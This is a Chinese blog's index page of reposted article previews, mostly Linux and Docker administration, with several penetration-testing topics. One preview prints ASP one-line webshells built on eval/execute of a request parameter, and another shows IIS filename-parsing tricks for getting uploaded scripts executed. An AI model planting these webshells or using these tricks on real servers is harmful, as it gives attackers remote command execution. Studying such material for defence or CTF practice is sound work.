diqi0762-CSDN博客

转载 Ubuntu18.04安装docker、docker－compose、

Ubuntu18.04下Docker CE安装Docker版本分为两个：Docker Community Edition (CE)和 Docker Enterprise Edition (EE)。Docker CE社区版本适合个人用户使用。Ubuntu18.04下安装Docker CE有如下几种主要方法，推荐方法一自动安装：方法一：1 使用官方脚本自...

2019-04-16 09:38:00 2155

转载隐匿攻击－ICMP

ICMP隐蔽隧道从入门到精通概述众所周知传统socket隧道已极少，tcp、upd大量被防御系统拦截，dns、icmp、http/https等难于禁止的协议（当然还有各种xx over dns/icmp/http，后续再讲）已成为黑客控制隧道的主流。本文从技术原理、实现方式、检测防御等多个维度解释隐蔽性最强的icmp隧道的相关知识...

2019-03-25 13:38:00 475

转载内网渗透学习

Table of Contents信息搜集开源情报信息收集（OSINT）githubwhois查询/注册人反查/邮箱反查/相关资产google hacking创建企业密码字典字典列表邮箱列表获取泄露密码查询对企业外部相关信息进行搜集子域名获取进入内网基于企业...

2019-03-25 11:52:00 1543

转载内网渗透知识点总结

史上最强内网渗透知识点总结获取 webshell 进内网测试主站，搜 wooyun 历史洞未发现历史洞，github, svn, 目录扫描未发现敏感信息, 无域传送，端口只开了80端口，找到后台地址，想爆破后台，验证码后台验证，一次性，用 ocr 识别，找账号，通过 google，baidu，bing 等搜索，相关邮箱，域名等加常用密码组成字典，发现用户手册，找账号，...

2019-02-18 14:30:00 1485

转载内网安全检查/渗透介绍

1. 内网安全检查/渗透介绍1.1 攻击思路有2种思路：攻击外网服务器，获取外网服务器的权限，接着利用入侵成功的外网服务器作为跳板，攻击内网其他服务器，最后获得敏感数据，并将数据传递到攻击者，看情况安装长期后门，实现长期控制和获得敏感数据的方式；攻击办公网的系统、办公网电脑、办公网无线等方式，一般是采用社工，实现控制办公电脑，再用获得的办公...

2019-02-18 14:08:00 2472

转载 http协议介绍

HTTP简介HTTP协议是Hyper Text Transfer Protocol（超文本传输协议）的缩写,是用于从万维网（WWW:World Wide Web ）服务器传输超文本到本地浏览器的传送协议。HTTP是一个基于TCP/IP通信协议来传递数据（HTML 文件, 图片文件, 查询结果等）。HTTP是一个属于应用层的面向对象的协议，由...

2019-02-18 13:49:00 74

转载使用Bind提供域名解析服务

第13章使用Bind提供域名解析服务章节简述：本章讲解了DNS域名解析服务的原理以及作用，介绍了域名查询功能中正向解析与反向解析的作用，并通过实验的方式演示了如何在DNS主服务器上部署正、反解析工作模式，以便让大家深刻体会到DNS域名查询的便利以及强大。本章还介绍了如何部署DNS从服务器以及DNS缓存服务器来提升用户的域名查询体验，以及如何使用ch...

2019-02-14 20:36:00 340

转载 .bash_profile和.bashrc的区别

Linux下环境变量配置方法梳理（.bash_profile和.bashrc的区别）在linux系统下，如果下载并安装了应用程序，在启动时很有可能在键入它的名称时出现"command not found"的提示内容。如果每次都到安装目标文件夹内，找到可执行文件来进行操作就太繁琐了，这种情况下就涉及到环境变量PATH的设置问题，而PATH的设置...

2019-01-11 21:15:00 70

转载 SNAT和DNAT

SNAT和DNATSNAT和DNAT简介SNAT：局域网共享一个公网IP接入lnternel，好处如下1、保护内网用户安全，因为公网地址总有一些人恶意扫描，而内网地址在公网没有路由所以无法被扫描，能被扫描的只有防火墙这一台，这样就减少了被***的可能。2、Ipv4地址匮乏，很多公司只有一个ipv4地址，但是却有几百个用户需要上网，这个时候就需要使用...

2019-01-10 21:15:00 234

转载 9.Iptables与Firewalld防火墙

第9章 Iptables与Firewalld防火墙章节简述：保障数据的安全性是继保障数据的可用性之后最为重要的一项工作。防火墙作为公网与内网之间的保护屏障，在保障数据的安全性方面起着至关重要的作用。考虑到大家还不了解RHEL 7中新增的firewalld防火墙与先前版本中iptables防火墙之间的区别，刘遄老师决定先带领读者从理...

2019-01-10 19:31:00 159

转载 Redhat 7使用CentOS 7的Yum网络源

Redhat 7使用CentOS 7的Yum网络源在学习“第1章部署虚拟环境安装linux系统—Yum软件仓库”有介绍yum网络源，所以决定尝试一下CentOS的网络源，这样在安装依赖包时就会方便很多，由于redhat 的更新包只对注册的用户生效，所以需要自己手动更改成CentOS 的更新包，CentOS几乎和redhat是一样的，所以无需担心软件包是...

2019-01-09 21:52:00 102

转载 Redhat7配置yum源(本地源和网络源)

Redhat7配置yum源(本地源和网络源)目录一：配置本地yum源二：配置网络yum源YUM(Yellow dog Updater Modified): yum是基于RPM包构建的软件更新机制，可以自动解决rpm包之间的依赖关系，所有软件包由集中的yum软件仓库提供。其理念是使用一个中心仓库(repository)管理一部分甚至一个distri...

2019-01-09 21:35:00 2289

转载 8、源码安装

第8章源码安装章节概述：LNMP动态网站部署架构是一套由Linux + Nginx + MySQL + PHP组成的动态网站系统解决方案，具有免费、高效、扩展性强且资源消耗低等优良特性。本章首先对比了使用源码包安装服务程序与使用RPM软件包安装服务程序的区别，然后讲解了如何手工编译源码包并安装各个服务程序。本章目录结构8.1 源码包程序...

2019-01-09 20:47:00 677

转载 6.存储结构与磁盘划分

第6章存储结构与磁盘划分章节简述：Linux系统中颇具特色的文件存储结构常常搞得新手头晕脑胀，本章将从Linux系统中的文件存储结构开始，讲述文件系统层次化标准（FHS，Filesystem Hierarchy Standard）、udev硬件命名规则以及硬盘分区的规划方法。为了让读者更好地理解文件系统的作用，刘遄老师将在本章中详细地分析Linux系...

2019-01-07 15:44:00 329

转载 5.用户身份与文件权限

第5章用户身份与文件权限章节简述：Linux是一个多用户、多任务的操作系统，具有很好的稳定性与安全性，在幕后保障Linux系统安全的则是一系列复杂的配置工作。本章将详细讲解文件的所有者、所属组以及其他人可对文件进行的读（r）、写（w）、执行（x）等操作，以及如何在Linux系统中添加、删除、修改用户账户信息。我们还可以使用SUID、SGID与SBIT特殊...

2019-01-07 15:41:00 404

转载 4.Vim编辑器与Shell命令脚本

第4章 Vim编辑器与Shell命令脚本章节简述:本章首先讲解如何使用Vim编辑器来编写、修改文档，然后通过逐个配置主机名称、系统网卡以及Yum软件仓库参数文件等实验，帮助读者加深Vim编辑器中诸多命令、快捷键、模式切换方法的理解。然后把前面章节中讲解的Linux命令、命令语法与Shell脚本中的各种流程控制语句通过Vim编辑器写到Shell脚本中结合到一...

2019-01-07 15:37:00 219

转载 3.管道符、重定向与环境变量

第3章管道符、重定向与环境变量章节概述：目前为止，我们已经学习了数十个常用的Linux系统命令，如果不能把这些命令进行组合使用，则无法提升工作效率。本章首先讲解与文件读写操作有关的重定向技术的5种模式—标准覆盖输出重定向、标准追加输出重定向、错误覆盖输出重定向、错误追加输出重定向以及输入重定向，让读者通过实验切实理解每个重定向模式的作用，解决输出信息的保...

2019-01-06 22:39:00 122

转载 2.新手必须掌握的Linux命令

第2章新手必须掌握的Linux命令章节简述：本章首先介绍系统内核和Shell终端的关系与作用，然后介绍Bash解释器的4大优势并学习Linux命令的执行方法。经验丰富的运维人员可以通过合理地组合适当的命令与参数，来更精准地满足工作需求，迅速得到自己想要的结果，还可以尽可能地降低系统资源消耗。本书精挑细选出读者有必要首先学习的数十个Linux命令，它们...

2019-01-06 21:42:00 393

转载 1.部署虚拟环境安装linux系统

第1章部署虚拟环境安装linux系统章节简述：本章从零基础详细讲解了虚拟机软件与红帽Linux系统，完整演示了VM虚拟机的安装与配置过程，以及红帽RHEL 7系统的安装、配置过程和初始化方法。此外，本章还涵盖了在Linux系统中找回root管理员密码、RPM与Yum软...

2019-01-06 21:37:00 199

转载 1.逆向笔记--进制

一 .进制的定义二进制：0-150000 　　0001　　0010　　0011　　0100　　0101　　0110　　0111　　1000　　1001　　1010　　1011　　1100　　1101　　1110　　1111十六进制：(1个十六进制数 == 4个二进制数)0　　　　 1　　　 2　　　 3　　　 4　　　 5　　　 6　　　 7　　　...

2018-08-17 13:41:00 263

转载各种一句话木马大全

各种一句话木马大全<%eval request("c")%> <%execute request("c")%> <%execute(request("c"))%> <%ExecuteGlobal request("sb")%> %><%Eval(Request(chr(35)))%><% &l...

2018-08-05 16:53:00 464

转载利用shell脚本监控目录内文件改动

利用shell脚本监控目录内文件改动#! /bin/bashwebroot="/home/www/"cp /dev/null rsync_fileif [ ! -f file.md5 ];then find $webroot -type f -exec md5sum {} \; >>file.md5else...

2018-08-03 10:07:00 521

转载华为交换机基本操作

一、Console口重置密码Console口是交换机的原始控制端口，任何对交换机的操作、设置都可以通过console口完成。如果console口被设置了密码保护，则需要清空密码。通过 BootROM 清除 Console 口登录密码。步骤如下：1、通过Console口连接交换机，并重启交换机。当界面出现以下打印信息时，及时按下快捷键“Ctrl+B...

2018-08-03 09:35:00 1441

转载 vmware的vmdk格式虚拟机转换为qcow2格式

今天应其他部门的需求，把一个笔记本里的vmware的window2008的虚拟机转换为qcow2格式，在公司服务器上运行。第一次做，用了许多时间首先：虚拟机的镜像分为多个vmdk文件，所以我们应该把这些vmdk文件合为一个vmdk文件。用windows下的vmware-vdiskmanager.exe命令，这个在vmware的安装目录下。...

2018-07-19 14:29:00 1142

转载 IPy模块--IP地址处理

Python之实用的IP地址处理模块IPy实用的IP地址处理模块IPy在IP地址规划中，涉及到计算大量的IP地址，包括网段、网络掩码、广播地址、子网数、IP类型等别担心，Ipy模块拯救你。Ipy模块可以很好的辅助我们高效的完成IP的规划工作。源码方式安装Ipy模块$ wget https://pypi.python.org/packages/source/I/IPy/...

2018-07-18 11:38:00 229

转载 CTF线下赛AWD套路小结

一、 AWD模式简介AWD：Attack With Defence，比赛中每个队伍维护多台服务器，服务器中存在多个漏洞，利用漏洞攻击其他队伍可以进行得分，修复漏洞可以避免被其他队伍攻击失分。一般分配Web服务器，服务器（多数为Linux）某处存在flag（一般在根目录下）；可能会提供一台流量分析虚拟机，可以下载流量文件进行数据分析；flag在主办方的设定下每隔一定时...

2018-07-18 11:05:00 1379

转载六、harbor使用

1 登录harbordocker login 10.1.2.62 打上标签docker tag e3a875d407cf 10.1.2.6/library/ctf3:xss013 push到harbordocker push 10.1.2.6/library/ctf3:xss014 登录harbor查看5 pull镜像docker pull...

2018-06-28 15:24:00 155

转载 CentOS6.5的安装及忘记root密码的措施

CentOS6.5的安装及忘记root密码的措施VMware虚拟机的配置1.文件->新建->自定义->下一步2.选择稍后安装操作系统我们将采用自定义安装，杜绝VMware的一键安装（其弊端就是有些环境，rpm源码包不会自动装上，仅仅会装一些基本的配件）。3.选择Linux(L)->CentOS 64位如果你的镜像是32位，就...

2018-05-09 00:06:00 195

转载 linux磁盘分区详解

如果你想了解linux分区,请务必认真阅读本文.对于初学者来说,linux分区不像windows下那么一目了解在学习 Linux 的过程中，安装 Linux 是每一个初学者的第一个门槛。在这个过程中间，最大的困惑莫过于给硬盘进行分区。虽然，现在各种发行版本的 Linux 已经提供了友好的图形交互界面，但是很多的人还是感觉无从下手。这其中的原因主要是不清楚 Linux 的分区规定，以及它...

2018-05-08 23:59:00 133

转载 xfce-openvas9

1安装OpenVas第一步，添加PPA源，在这我用的是一台新装的Ubuntu安装OpenVas，运行以下命令就可以进行安装root@ubuntu:~# add-apt-repository ppa:mrazavi/openvas输完命令可发现，有两个OpenVas的安装版本，并且对版本进行简单的介绍和更新命令的介绍。我们选择openvas9版本进行安装。第二步，...

2018-05-01 23:50:00 228

转载 xfce-OpenVAS自动化安全风险评估指南

1.登录系统在客户端，打开浏览器，在地址栏输入https://IP:9392/看到如下界面：我们要信任此网站，点击继续浏览此网站，进入系统登录界面，如下图：输入我提供的通用登录账号：wdluser，密码：user，登陆成功，进入系统：2.扫描主机漏洞2.1建立新的target点击添加标志后，出现...

2018-05-01 23:18:00 236

转载 xfce-OpenVAS

OpenVAS开源风险评估系统部署方案OpenVAS，即开放式漏洞评估系统，是一个用于评估目标漏洞的杰出框架。功能十分强大，最重要的是，它是“开源”的——就是免费的意思啦～它与著名的Nessus“本是同根生”，在Nessus商业化之后仍然坚持开源，号称“当前最好用的开源漏洞扫描工具”。最新版的Kali Linux(kali 3.0)不再自带OpenVAS了，所以...

2018-05-01 22:38:00 176

转载 kali-set

Set 简介开源的社会工程学利用套件，通常结合metasploit(部分)来使用更改 /etc/setoolkit下的配置文件 set_config BLEEDING_EDGE="False"　未True 这条命令会添加kali-bleeding-edge源，来保持软件的最新。第一层界面当启用 Setoolkit 时第一层界面...

2018-04-30 22:43:00 225

转载 kali-xfce的简单配置

1.更新设置kali的更新源在终端中打开sources.listroot@kali:~# vim /etc/apt/sources.list删除里面的注释，清空。然后输入下面的更新源地址：deb http://http.kali.org/kali kali-rolling main non-free contrib保存，保存退出，然后更新。root@k...

2018-04-30 22:16:00 488

转载 vm下-kali-linux-xfce-2018.1的简略安装

1.选择版本为 debian 系统，因为是kali是基于debian的linux发行版2.在安装首页选择 Graphical install，图形化安装，之后会让选择语言，选择简体中文，中国等，这些东西根据自己需要填写即可。3.主机名可以随意写，域名可以不填，之后会让设置一个用户明密码4.磁盘选择使用整个磁盘，后面一路继续，知道有一个将改动写入磁盘的选项，选择是...

2018-04-30 21:52:00 184

转载 kali2018 安装****

1.安装需要的依赖包：apt-get install qt5-qmake qtbase5-dev libqrencode-dev libappindicator-dev libzbar-devroot@kali:~# apt-get install qt5-qmake qtbase5-dev libqrencode-dev libappindicator-de...

2018-04-30 21:11:00 363

转载 IIS PUT

测试版本:IIS6.0利用工具1、IIS PUT Scaner By ZwelL2、桂林老兵IIS写权限利用程序----------------------------------------1、IIS来宾用户对网站文件夹有写入权限2、Web服务扩展:WebDAV—打勾3、网站主目录:写入—打勾(可PUT)4、网站主目录:脚本资源访问—打勾（可...

2018-04-22 23:39:00 282

转载解析漏洞总结

原文地址:http://drops.wooyun.org/papers/539一、IIS 5.x/6.0解析漏洞IIS 6.0解析利用方法有两种1.目录解析/xx.asp/xx.jpg2.文件解析wooyun.asp;.jpg 第一种，在网站下建立文件夹的名字为 .asp、.asa 的文件夹，其目录内的任何扩展名的文件都被IIS当作asp文件...

2018-04-22 21:46:00 66

转载 docker.io/centos安装phpstudy

1.准备工作yum install vimyum install wget yum install makeyum -y install bzip2yum install m4yum install gcc gcc-c++ glibc-static -y //安装旧的gcc相关的编译工具2.下载gcc 4.8.2源代码wget http://gc...

2018-04-21 18:49:00 928

转载七、docker基本命令

Docker 基本命令docker的基本命令docker version ：查看docker的版本号，包括客户端、服务端、依赖的Go等[root@centos7 ~]# docker versionClient: Version: 1.8.2-el7.centos API version: 1.20 Package Vers...

2018-04-20 12:51:00 100

空空如也

空空如也